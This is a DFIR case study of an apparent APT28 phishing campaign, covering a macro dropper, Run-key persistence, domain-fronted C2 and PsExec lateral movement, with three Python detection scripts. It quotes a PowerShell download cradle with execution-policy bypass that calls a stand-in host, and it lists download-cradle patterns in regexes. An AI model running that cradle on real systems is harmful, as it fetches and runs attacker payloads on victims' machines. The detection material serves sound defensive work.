APT28 Sophisticated Phishing Campaign Involving Custom Malware: A DFIR Case Study

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

  • APT28 employs social engineering tactics in phishing emails to gain initial access to target systems.
  • The malware observed included sophisticated custom dropper techniques, which obfuscate payloads to evade detection.
  • C2 communication patterns indicate the use of domain fronting to mask malicious traffic.

Executive Summary

During our investigation into a recent incident linked to APT28, also known as Fancy Bear, we observed a well-orchestrated attack campaign utilizing phishing emails to gain initial access to a major government contractor’s network. The actor employed a combination of custom malware to facilitate lateral movement and maintain persistence within the environment. The investigation revealed intricate details about the attack chain, including initial access methods, execution tactics, command and control infrastructure, and the ultimate objectives of the adversary.

Initial Access

Initial access was achieved through carefully crafted phishing emails carrying malicious attachments. The emails masqueraded as legitimate correspondence from internal departments and were addressed to specific employees to build trust. The attachment, a Word document, contained a macro that, once the recipient enabled content, launched a PowerShell command to fetch the initial payload from a server controlled by the actor. The command took the following form: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://maliciousdomain.com/payload.exe' -OutFile '%TEMP%\malware.exe'". Two details matter for detection. First, -ExecutionPolicy Bypass is set so that the host's script policy cannot block the cradle; a bypass flag on a PowerShell process spawned by an Office application is rarely legitimate. Second, the output path uses a cmd-style %TEMP% inside single quotes, which PowerShell itself does not expand; it only resolves if the macro launched the command through a shell that expands environment variables before PowerShell starts. The parent-child relationship (an Office process spawning PowerShell) is the strongest single signal in this chain.
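As an added example, not code from the original report or from any tool it names, the following Python applies this reasoning to process-creation events in the shape of Sysmon Event ID 1 records. The sample events, the allow-listed domain updates.example.internal, and the alert threshold are all constructed for illustration. The rule looks for the traits the chain above exhibits (Office parent, policy bypass, download cradle, non-allow-listed URL) and also decodes -EncodedCommand payloads, since the same cradle is often hidden that way:

```python
import base64
import re
from typing import Dict, List, Set, Tuple

# Constructed sample process-creation events in the shape of Sysmon Event ID 1
# records. They illustrate the patterns; none are records from the incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the Word-macro-to-PowerShell chain described above
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": ("powershell -ExecutionPolicy Bypass -Command "
                        "\"Invoke-WebRequest -Uri 'http://maliciousdomain.com/payload.exe' "
                        "-OutFile '%TEMP%\\malware.exe'\""),
    },
    {   # routine interactive use; must not alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -NoProfile -Command "Get-ChildItem C:\\logs"',
    },
    {   # policy bypass plus an encoded command (base64 of UTF-16LE "Invoke-WebRequest")
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": "powershell.exe -ep bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA==",
    },
    {   # a download cradle, but to an allow-listed internal host from a desktop session
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": ("powershell -Command \"Invoke-WebRequest "
                        "-Uri 'https://updates.example.internal/agent.msi' "
                        "-OutFile 'C:\\Temp\\agent.msi'\""),
    },
]

# Assumed allow-list of hosts the organisation legitimately downloads from.
ALLOWED_DOMAINS: Set[str] = {"updates.example.internal"}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Common download cradles: cmdlets, their aliases, and the .NET WebClient methods.
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
BYPASS_RE = re.compile(r"-(?:executionpolicy|exec|ep)\s+bypass", re.I)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (os.path will not split '\\' on Linux)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str], allowlist: Set[str] = ALLOWED_DOMAINS) -> List[str]:
    """Return the list of suspicious traits found in one PowerShell process-creation event."""
    if basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return []
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("office-parent")
    if BYPASS_RE.search(cmd):
        reasons.append("policy-bypass")
    scan_text = cmd
    m = ENCODED_RE.search(cmd)
    if m:
        reasons.append("encoded-command")
        try:  # -EncodedCommand takes base64 of UTF-16LE; decode so cradles inside it are seen
            scan_text += " " + base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
        except ValueError:
            pass
    if CRADLE_RE.search(scan_text):
        reasons.append("download-cradle")
    for host in URL_RE.findall(scan_text):
        if host.lower() not in allowlist:
            reasons.append(f"untrusted-domain:{host.lower()}")
    return reasons


def alerts(events: List[Dict[str, str]], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """Events whose trait count meets the threshold; one trait alone is usually benign."""
    hits = []
    for idx, event in enumerate(events):
        reasons = score_event(event)
        if len(reasons) >= threshold:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in alerts(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The threshold is what keeps this usable: a lone Invoke-WebRequest from an interactive session to an allow-listed host (event 3) scores one trait and stays quiet, while the macro chain (event 0) and the encoded launch from a service host (event 2) each accumulate several.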

Execution & Persistence

Upon execution, the dropped payload was identified as a custom dropper. It obfuscates the embedded payload it unpacks, which made reverse engineering of the final stage's functionality significantly harder. For persistence, the malware wrote a value named malicious.exe under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pointing at the dropped binary, so the payload is relaunched each time that user logs on (HKCU Run values fire at user logon, not at system boot, and need no elevation to create). This is the Registry Run Keys / Startup Folder technique, and it kept the implant active for the duration of the user's sessions.

Command and Control

The Command and Control (C2) channel was built to blend in rather than to hide. The malware initiated outbound connections to an IP address belonging to a well-known cloud service provider, and traffic analysis showed domain fronting: the TLS handshake's Server Name Indication (SNI) named a legitimate domain served from that provider's edge, while the Host header inside the encrypted session addressed the actor's own backend, so DNS logs, SNI-based filtering and reputation lookups saw only the legitimate name. Beaconing was regular, one request every 5 minutes over HTTPS, and each request carried a unique identifier for the compromised host, which let the actor keep an inventory of its footholds. The two observables that survive this design are the clockwork timing and, where TLS is inspected, the mismatch between SNI and Host header.
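To make those two observables concrete, the following added Python example (not from the original report) scores proxy records for periodic beaconing and for the SNI/Host mismatch that domain fronting produces. Every host name, IP address and timestamp in it is constructed; 203.0.113.0/24 is a documentation range, not the provider observed, and the record layout is an assumption about what a TLS-inspecting proxy would log:

```python
import statistics
from collections import defaultdict
from typing import Dict, List

BASE_TS = 1_700_000_000  # arbitrary epoch seconds for the constructed log


def _rec(ts: int, src: str, dst: str, sni: str, host: str) -> Dict:
    return {"ts": ts, "src": src, "dst": dst, "sni": sni, "host": host}


# Constructed proxy/TLS-inspection records, not data from the incident. Host
# 10.0.0.15 beacons every ~300 s to a cloud edge IP (TEST-NET-3 range used here),
# presenting one name in the TLS SNI and a different one in the HTTP Host header.
# Host 10.0.0.22 browses irregularly with SNI and Host agreeing. All names assumed.
SAMPLE_RECORDS: List[Dict] = (
    [_rec(BASE_TS + i * 300 + jitter, "10.0.0.15", "203.0.113.10",
          "cdn-edge.example.com", "update-api.example.net")
     for i, jitter in enumerate([0, 3, -2, 4, 1, -3, 2, 0])]
    + [_rec(BASE_TS + off, "10.0.0.22", "203.0.113.20",
            "www.example.org", "www.example.org")
       for off in [0, 40, 41, 500, 503, 1900, 1950, 3000]]
)


def beacon_candidates(records: List[Dict], min_hits: int = 6, max_cv: float = 0.2) -> List[Dict]:
    """Flag (src, dst) pairs whose inter-request gaps are nearly constant.

    cv = stdev/mean of the gaps. Human browsing is bursty (cv well above 1); a
    fixed-interval beacon with light jitter sits well under 0.2. Raise max_cv for
    implants that randomise their sleep heavily, at the cost of more noise."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["dst"])].append(r["ts"])
    found = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            found.append({"src": src, "dst": dst, "hits": len(times),
                          "interval_s": round(mean), "cv": round(cv, 3)})
    return found


def fronting_candidates(records: List[Dict]) -> List[Dict]:
    """Records where the TLS SNI and the inner HTTP Host header disagree.

    That mismatch is the observable signature of domain fronting. It is only
    visible where the proxy decrypts TLS (or otherwise logs the inner Host header);
    without inspection, fall back on the timing analysis above."""
    return [r for r in records
            if r.get("sni") and r.get("host") and r["sni"].lower() != r["host"].lower()]


if __name__ == "__main__":
    for b in beacon_candidates(SAMPLE_RECORDS):
        print(f"beacon: {b['src']} -> {b['dst']} every ~{b['interval_s']}s "
              f"({b['hits']} hits, cv={b['cv']})")
    for r in fronting_candidates(SAMPLE_RECORDS):
        print(f"fronting? {r['src']} SNI={r['sni']} Host={r['host']}")
```

Run over a day of proxy logs, the beacon check will also surface legitimate periodic traffic (update checks, monitoring agents), so pair it with the destination allow-list the organisation already maintains; the SNI/Host mismatch, by contrast, has very few benign causes and deserves a direct alert.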

Lateral Movement & Discovery

After establishing a foothold, the actor moved laterally over Windows admin shares (ADMIN$, C$), using PsExec to copy and execute additional payloads on other hosts. We observed use of compromised administrative credentials, indicating that the actor had harvested credential hashes from the initially compromised host and reused them to authenticate elsewhere. From each new host the actor ran enumeration commands to collect further credentials and locate sensitive data repositories, consolidating its presence in the environment. PsExec over admin shares leaves a characteristic trail worth hunting for: a binary written to ADMIN$ on the target, a service installation event there (System log Event ID 7045; the default service name is PSEXESVC unless the operator renames it), and network logons (type 3) from the source host using the administrative account.

Impact & Objectives

The overarching goal of the campaign appeared to be reconnaissance and, potentially, exfiltration of sensitive government data. We did not directly observe exfiltration during our analysis, but the care taken in lateral movement and discovery indicates that significant sensitive information was at risk. The dropper's ability to stage further payloads also means that disruptive follow-on actions against network operations could not be ruled out.

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment: the macro-enabled Word document delivered by email.
  • T1204.002 – User Execution: Malicious File: the recipient enabling the macro. (Not T1203, Exploitation for Client Execution, which covers exploitation of a client-side vulnerability; no exploit was involved here.)
  • T1059.001 – Command and Scripting Interpreter: PowerShell: the download cradle launched by the macro.
  • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: the HKCU Run value.
  • T1071.001 – Application Layer Protocol: Web Protocols: HTTPS beaconing to the C2 server.
  • T1090.004 – Proxy: Domain Fronting: legitimate cloud domains used to mask the C2 endpoint.
  • T1021.002 – Remote Services: SMB/Windows Admin Shares, together with T1570 – Lateral Tool Transfer: PsExec over admin shares.
  • T1003 – OS Credential Dumping: the credential hashes harvested from the first compromised host.

Detection Opportunities

  • Alert on PowerShell spawned by an Office process, especially with -ExecutionPolicy Bypass, an encoded command, or a download cradle (Invoke-WebRequest, Net.WebClient) that points at a domain outside the organisation's allow-list.
  • Have endpoint detection and response tooling alert on new Run/RunOnce values, prioritising those whose target lives in a user-writable location (AppData, Temp, ProgramData, Public) or that are written by the very binary they point to.
  • At the network edge, look for fixed-interval beaconing (for example one request every 5 minutes with little jitter) and, where TLS is inspected, for a mismatch between the TLS SNI and the HTTP Host header. Connections to cloud provider IP space alone are far too common to alert on; the periodicity and the name mismatch are the signal.
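For the Run-key persistence described in the Execution & Persistence section and the second detection opportunity above, here is an added Python example (not from the original report) that triages Sysmon Event ID 13 registry value-set records. The events, the user SID, the paths and the baseline of known-good entries are all constructed; the point it makes is that "new Run value" is too noisy on its own, while "Run value pointing into a user-writable directory, not in the baseline, written by the binary it points to" is a tight signal:

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records, not from the incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the implant registering itself from a temp directory
        "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\malicious.exe",
        "Details": r"C:\Users\jdoe\AppData\Local\Temp\malware.exe",
        "Image": r"C:\Users\jdoe\AppData\Local\Temp\malware.exe",
    },
    {   # a legitimate per-user app that also lives under AppData; covered by the baseline
        "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "Details": r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "Image": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
    },
    {   # machine-wide entry pointing into the Windows directory
        "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
        "Details": r"%windir%\system32\SecurityHealthSystray.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
    },
    {   # unrelated registry write; ignored
        "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\Local Settings\MuiCache\x",
        "Details": r"C:\Windows\System32\notepad.exe",
        "Image": r"C:\Windows\explorer.exe",
    },
]

# Assumed baseline: value name -> path suffix for Run entries known to be legitimate.
BASELINE: Dict[str, str] = {
    "onedrive": r"\appdata\local\microsoft\onedrive\onedrive.exe",
}

# Matches per-user (HKU\<SID>) and machine-wide (HKLM) Run and RunOnce values.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\([^\\]+)$", re.I)
# Locations an unprivileged user (or malware running as that user) can write to.
USER_WRITABLE_RE = re.compile(
    r"\\AppData\\|\\Temp\\|%TEMP%|%TMP%|%APPDATA%|%LOCALAPPDATA%|\\ProgramData\\"
    r"|\\Users\\Public\\|\\Downloads\\", re.I)


def exe_from_details(details: str) -> str:
    """Executable path from a Run value's data: strip quotes and trailing arguments."""
    d = details.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    return d.split(" ", 1)[0]


def run_key_findings(events: List[Dict[str, str]], baseline: Dict[str, str] = BASELINE) -> List[Dict]:
    """Return Run/RunOnce value writes that look like user-land persistence."""
    findings = []
    for ev in events:
        m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue
        value_name = m.group(2)
        details = ev.get("Details", "")
        exe = exe_from_details(details)
        suffix = baseline.get(value_name.lower())
        if suffix and exe.lower().endswith(suffix):
            continue  # known-good entry at its expected path
        reasons = []
        if USER_WRITABLE_RE.search(details):
            reasons.append("user-writable-path")
        if exe.lower() == ev.get("Image", "").lower():
            reasons.append("self-registering")
        if reasons:
            findings.append({"key": m.group(1), "value_name": value_name, "exe": exe,
                             "writer": ev.get("Image", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in run_key_findings(SAMPLE_EVENTS):
        print(f"{f['key']}\\{f['value_name']} -> {f['exe']} (written by {f['writer']}): "
              f"{', '.join(f['reasons'])}")
```

Without a baseline the OneDrive entry is flagged too, which is exactly the false positive that makes analysts tune Run-key alerts off; maintaining the baseline from a clean build is what keeps the rule on.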

Analyst Notes

This incident serves as a stark reminder of the evolving tactics employed by threat actors such as APT28. The reliance on phishing and sophisticated malware underscores the necessity for comprehensive employee training on social engineering and phishing detection. Further, it illustrates the importance of layered security measures involving both endpoint and network defenses to mitigate the risks of such advanced persistent threats. As the threat landscape continues to evolve, our detection capabilities must adapt accordingly to stay one step ahead of the adversaries.

Source: Original Report